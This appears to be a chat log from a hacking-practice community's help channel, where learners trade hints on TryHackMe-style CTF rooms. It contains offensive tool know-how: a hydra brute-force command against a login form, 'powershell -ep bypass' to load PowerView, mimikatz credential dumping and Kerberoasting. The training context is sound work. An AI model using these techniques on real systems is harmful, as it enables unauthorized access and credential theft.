@muted hatch DM me your VM IP and I can check if it's you or the box

Hey everyone. Can anyone please help me with the room ctf100? I’m stuck on flag77, trying to get the password of the user “level5”. I have tried to find all files associated with level5, but that has let me nowhere. Any pointers on what to do would be greatly appreciated

hi all is common that Blue room dosent spawn the shell, i have stopped and re deployed the machine couple of times, even changing the payload directly to meterpreter and i cant achieve to connect.

@white salmon Are you attacking from a VM?

yeap

Where is your VPN running?

US-West-Regular-1

@white salmon Not what I meant. Is it running on the VM or on the host?

@white salmon Not what I meant. Is it running on the VM or on the host?
@stuck fractal Vbox - Kali - VPN, OSX host machine

the VPN is running on the VM rather than on OSX?

the VPN is running on the VM rather than on OSX?
@stuck fractal is correct, i have solved many rooms these way without problems util now

Check your LHOST

Check your LHOST
@stuck fractal ok man let me re check thanks

ohh so stupid haha, thanks, maybe i need rest now haha

i have the 3 numbers of the djinn ||telnet||

and im trying ||port knocking and then ssh||

but i guess thats not the solution

can you give me a hint?

Has anyone solved the Impossible Challenge Room?

can you give me a hint?
rooted baby!!

I have a doubt in linuxctf room, Can anyone help?

Task 2 Flag 4 --> flag is not where it says

Task3 Flag 11 --> not able to find it

Task 2 Flag 4 --> flag is not where it says
@white salmon i guess it is, so try to search in another way

Task3 Flag 11 --> not able to find it
@white salmon why? what are you doing? Try to google some locations! read the question veeeeeery slowly and understanding every word

the flag is where is says it is, check all the users

or at least the one that owns flag11

Hello again all. Can I have some assistance with this one

https://tryhackme.com/room/linuxctf

Flag 26 is in some file at the beginning and starts with 4bceb

I've run my script against known hashes and it works fine. But it doesn't see anything that starts with 4bceb

I found files that have that string in the middle of the hash but nothing at the beginning

I've also run it from garry and alice

find / -type f 2>/dev/null | xargs grep "^4bceb" -a 2>/dev/null

^ that's what I used to search

@velvet wharf you can try -name 4bceb* for find param

@white salmon That'd be if that was the file name

It's not the file name

It's the file content

hi i am currently doing https://tryhackme.com/room/commonlinuxprivesc and on task 8 when says to run msfvenom, i get back "msfvenom: command not found"

Slow down and think about what you're doing

msfvenom is a hacking tool

It won't be installed on the target system that you're trying to exploit

Question 10: https://tryhackme.com/room/pentestquestionaire
Last open question for me^^ What am I looking for? Is that a name of a specific vulnerability or more like a general term?

General term
Like: DOS, slowloris...

thanks, got it

hi m stuck n https://tryhackme.com/room/linuxctf task4 in the fifth question : it says Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code.

Find a command that might reveal human readable strings when looking in the source code.

am i spsd to reverse engineer the file with gdb cause the only readable string i can find is not the flag

what have you tried exactly?

dunno about the second questions

should i find the flag myself ?

man ls

is it mentioned there i'm confused

Don't show answers here

It is mentioned

You can scroll in man pages with the arrow keys

ok i see now

• you can search there too 👀

how would i have known to use man ls

you could also have found it with some research

^^^^

The room tells you how to use both

@glossy basin Swafox i tried strings, gdb to look into the registers for anything, less, cat, nano,

i checked ls and there is one file

how do i see file's extensions

File extensions don't really exist

They're used by windows

But they're meaningless really

you mean in the rooms

or in general ?

general, in linux to see file type go: file <file_name>

found it

shiba1: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=48815f7cf6db8419190ec0530ce2e0c264c1db52, not stripped

kinda confused tbh

setuid ?

@green fossil are you still on flag24 ?

@restive plover it's a program.

no i found it i just didnt read well the strings output

oh nice

hi im stuck on task 4 of https://tryhackme.com/room/lianyu managed to get the file name from the previous question just at a loss as to where to continue to get the ftp password

have you opened the filename?

I did! i know i'm missing something with the token i'm given but i've tried to decode it and have come up empty so far

You haven't tried to decode it hard enough

oh okay thanks for the hint!

i just got it thanks guys!

hi i am doing the christmas challenge and i can seem to understand what am supposed to do in the day 1 task 3 section

Hello I am doing zthlinux room. Task 21 Binary shiba2. When I run the binary it returns - segmentation fault (core dumped). I googled this and tells me I am trying to access memory I dont have access too. bit lost here

@strong gate That means you haven't fulfilled the condition that the binary is checking for

@strong gate That means you haven't fulfilled the condition that the binary is checking for
@stuck fractal ok thank you

oh the thing actually segfaults?

@ripe hedge When you don't set the variable, yes

@noble geyser
... rushes into McElferson’s office. he's the admin, that exercise is exclusively related to the cookie

Hello everyone. Is there anyone who would be willing to walk me through decoding and combining 4 strings. I'm stuck in the biohazard room.

hi all, in room Post-Exploitation Basics when importing .zip file on Bloodhound says BAD JSON FILE . Maybe the version of Bloodhound that i installed on kali is more recent that SharpHound.ps1 on the room ?

i found other problem in Post-Exploitation Basics there isnt Machine1 NTLM hash to crack, only Machine2 (hashes that we got with mimikatz)

@white salmon read the note it says exactly why that might not work and what to do to fix for your 1st question

@white salmon read the note it says exactly why that might not work and what to do to fix for your 1st question
@solemn smelt ok Thanks

can you send me a dm with your mimikatz output for the lsadump

as long as you pull bloodhound and sharphound from the bloodhound repo, you shouldn't have any issues

as long as you pull bloodhound and sharphound from the bloodhound repo, you shouldn't have any issues
@last nova now works thanks

hi guys, on Post-Exploitation basics (the new room) I see 2 accounts for "List all Kerberoastable Accounts"... Neither is the right answer, what am I doing wrong?

reread the question

Any hint for zthlinux room task 43?

Look for files belonging to each user @strong gate

One will stand out as being a bit different

thanks

hey everyone! i am stuck on a flag hunt where i have to search the whole system to find a file containing a string. it's taking too long to serch the whole system the question does say the string is 32 char long but still it keep on running

has someone done the room "Basic Pentesting" and gotten initial shell the "second" way? None of the writeups seem to have.

nvm...found it! 🙂 Not sure how I could have found that web directory from the outside in. But I found it once inside the popular way for this box. Found and gained tomcat9 shell with MSF. py script was not working for me

Hey, in the room "lian_yu" , I've tried running dirbuster, ffuf, gobuster, but the site becomes unresponsive after few requests and I'm unable to brute force any further. I've even tried running on a single thread alone, but same thing happens. But the box clearly requires me to fuzz the directories, so what should i do now, is there anything on gobuster or dirbuster to keep it from crashing the site?..like lowering the number of requests per second?

Got the python exploit for struts on "Basic Pentesting" room working. What a pain in the...

yes you can change the timeout of gobuster with -to @obtuse charm

@solemn smelt I tried with -to 3m but still failed

sounds like a problem with your connection terminate redeploy if that doesnt help im not sure

Ok, l'll try doing something

can anyone help with task 7.2, it says there is supposed to be a welcome message with the syntax ^^^^^^^ ^^^^^^^^. but instead this pops up.

sorry the room is Network Services

Try netcat

i don't get the question

someone hint ? *

man su

and find out

@glossy basin

do they mean which type of shell there

or what shell ex user shell or super user shell ?

They mean for su

su is a program

"which shell is used" as what type or which user's shell ?

Just read the man page and try things out

you can specify a shell with su

the question is asking how to do that

they are asking how you can specify which shell you want to use.

e.g bash or sh etc

I'm doing the Inclusion room. Got the passwd and shadow file. Now i want to crack it with john. Can someone confirm the pw is in rockyou.txt?

@white salmon I can chuck hashcat at it and tell you if it is quite quickly if you DM me the hash to crack

can hydra http-post-from be configured to look at the content length for unsuccesfull login ?

so if content-length = 407 it is a failed login ?

content-length is usually used in the request, no?

a failed login will generally have an error message that can be regexed. or a status code

if i do a bruteforce ataack with burp i can see the content-length in the repsone is 259 for failed login

and 202 for success

Hydra uses the response to detect a failure

Look for words.

you can set it to detect success as well

Unreliably, in my experience

probably

never got it working properly either

yes I'm in the Authenticate room and i want to solve the first question with hydra instead of burp

but either i get all passwords to work or i get none

Look at the actual response

Not the length

See what's different

See if there's words you could use to detect failure

hydra -l jack -P /usr/share/wordlists/rockyou.txt -s 8888 BOX-IP http-post-form "/:user=^USER^&password=^PASS^:error"

i run it like so

it's F=error no?

No

By default, it assumes failure

yes

it's default

Ok, struggling with the room zthlinux final task. Getting the flag from /root/root.txt.

• Checked that none of the users I logged with are sudoers (so, can't access it)
• Digged around, maybe there was a copy of robots.txt somewhere (couldn't find it in the entire system).
• Checked all the previous tasks and read them carefully to make sure I did not miss any hints. (No luck)

Any hint?

don't overthink it

I tried a regular cat /root/root.txt too of course 😄 no luck

try to look at all the users again 🙂

arh found therror

it's the wrong url /login tnx for thehelp

that'll do it

I checked and logged with every user (shiba1 to shiba4 and also noot), couldn't get it. There's another user called nootnoot to which I've no password (tried all the user passwords plus several combinations). Tried user root (which seems to be the only one with access to /root) but neither.

Look for files belonging to each and every user

Maybe you can gain access to one of those users that you haven't before

Graphics card doesn't matter for VMs. Wrong chat.

Ok, yeah, I just needed to be a bit more persistent and as Ninja recommended check for all files belonging to the users (quite difficult as the one I needed was looonggggg above the list).

Thanks!

||FYI if you are looking for files you can remove ones you don't have permission to by using 2>/dev/null/||

More specifically

This redirects standard error output to /dev/null to discard it

Trying to get flag26 from linuxctf

||Find a file with a string that begins with 4bceb and is 32 characters long||

Based on this, I'm trying a:
||
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^4bceb[a-zA-Z0–9]{27}$' 2>/dev/null

{27} as it's 32 minus the 5 letters added at the beginning, 4bceb.

But it doesn't work at all. Any idea?||

There's another way to execute things with find

That's probably a bit less convoluted

Regex seems a bit off as well

The flag may or may not be at a word boundary

Probably no upper case if the other flags are any indication but that one matters less

yup, I tried first all lowercase but couldn't find any, so I added upper also. Anyhow it didn't find any... which makes me suspect the regex isn't properly formulated.

Try without the boundary flags

The rest looks alright

So im new and im doing the intro to research. Im stuck on the questio with the format for a password hash that starts with $6$. Ive found SHA512. but it asks unix variant and sha doesnt work

The answer isn't quite sha512

sha512 doesn't have a salt by default, and uses a single round

The implementation in Crypt for unix uses a salt, and defaults to 5000 rounds

Hence they're different in format name

Interesting. I cant seem to find that name tho. I keep seeong sha512 and samt stuff but the name of that encryption, i cant find

It's not encryption

Ye I cant find the name of the format of the password tho. It all says password hash or something like that

You're not far off

Just need to find the particular implementation name

Damn just got it. Now I feel stoopid

@red kestrel hey can you explain this ||
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^4bceb[a-zA-Z0–9]{27}$' 2>/dev/null||

@visual juniper don't worry, we all do sometimes

Grats though

hi i wanted some help in the 25 days to christmas room day 2 once you get the admin page what next i tried using gobuster to find extra directories but i found nothing please help

hello guys

I have a question for you

is there anything wrong with tempus fugit durius

?

How so? @echo thunder

can I PM you

in order to show you some screenshots

Try and diagnose it here or #room-help but I haven’t heard of any issues relating to it, technically speaking (:

ok

now it is working

sometimes the link need to entered few times

Ah sweet!

in order to work

first is giving error the file is not there

then if you close the tab and reopen it

it works

Are you sure you don’t have multiple connections to the VPN?

Sounds like that sorta issue tbh

One will stand out as being a bit different
@inland onyx Thanks, that took a long time. Maybe my eye's almost fell off. Maybe I need to get better at looking for file 🙂 I think I saw a room for that 😊

anyone done the tempus fugit durius challenge?

Don't ask to ask, just ask

the password for ||benclower|| is in the rockyou list?

@echo thunder yes

@red kestrel hey can you explain this ||
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^4bceb[a-zA-Z0–9]{27}$' 2>/dev/null||
@white salmon

find:

• regular files
• in no other filesystem
• print all results to std (using then xargs -0 for xargs to know the input will be separated with ASCII NUL character '\000'

The grep I think is quite self-explanatory, but just passing the regular expression indicated to pick up 4bceb plus 27 other characters within the range of a-z A-Z or 0-9.

Hello everyone!

im at ZTH and im trying to install xsrfprobe

but doesnt work

no errors showed, simply after installing with pip (or manually) there is no binary recognaissed

Probably your pip path isn't set up

idk but i'd reinstall it and worked

Well you're fine then

then i have another error while running it

using just xsrfprobe -u url

You can't imagine how much I love guessing... Can anyone share a slice of info about the correct wordlist for dir enum in room 25daysofchristmas Task 7?

try dirbuster 2.3 medium

Tried small, medium, big, dirbuster common and few others

Are you using the VM for day 1?

What do you mean vm for day one? I have access to webapp.

There's a webapp for day 1

And another for day 2

Each on different VMs

Make sure you deploy the right day

oh let me check

Yes I think that's the issue, thx

on question 10 for task 1 of the capture-the-flag room (https://tryhackme.com/room/c4ptur3th3fl4g) ive looked everywhere to try an identify this cipher, could someone give me a hint or a push? LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tL=

It's a combination

The last char is a hint

thank you

got it thanks

Looking for some help for room linuxctf.

Task 5.4.

|| I downloaded the file using scp (flag32.mp3) as instructed, but there's no audio at all on it, strings shows nothing. Converted to txt and nothing... ||

There is audio

ha, ok. I simply have no audio in the VM

Copy it off then

Or sort your audio on the VM

is there a reason ALOT of the powershell cmdlets dont work like the one we are told to use to find the OS|| Get-NetComputer -fulldata | select operatingsystem|| is just wont work

On what?

https://tryhackme.com/room/postexploit task 1 Q2

That's SSH being broken IIRC

im on RDP

the error says its not a real cmdlet

Maybe you needed to import a module?

Did you load powerview?

i did everything i was told to do in the walkthrough .... lemme try maybe its mssing or just expected

I think you missed importing powerview

Or missed a character when importing it

your right im sure, thanks

did it work?

alot of people are complaining about powershell not working but theyre just not properly loading up the tool in powershell

maybe sure you don't miss BOTH dots

hmmm no

it didnt

Import-Module C:\Users\Administrator\Downloads

then obvi i added the end

but getting all errors

wait nope it worked

correct command Import-Module C:\Users\Administrator\Downloads\PowerView.ps1

sorry guys

. .\PowerView.ps1

just use powershell -ep bypass then . .\PowerView.ps1 exactly like it says in the room

it worked only that way for me idk

what I was just checking it and it worked

yeah the cmdlets all work now

ive done that so many times , such a lousey mistake lol

how do you ssh into the box? ive tried administrator and root and it says wrong password

If you dont know password root previlages wont help ;P

ahhh

is there a reason the box says to log in with ssh then if u cant even do it?

it gives u a choice rdp or ssh

Then you're doing something wrong

hmmm i was doing at first Administrator@IP password : then the password then i just tried ssh IP

ok it worked copy paste was messing it up

um for bloodhount what do i put as the DB there is nothing about the database url and by default url shown in the walkthrough wont work... n

i have a feeling it needs neo4j

annnnd yup thats what it needed to work

that should def be in the walkthrough unless i was just a special ....

I am missing something obvious.....Network Services Room - Exploiting SMB - how to find the username?

use enum4linux to enumerate @pallid musk

anyone for a nudge on c4ptur3-th3-fl4g task 5, security through obscurity? struggling to find the file within the file. tried viewing metadata

Hey im in dogcat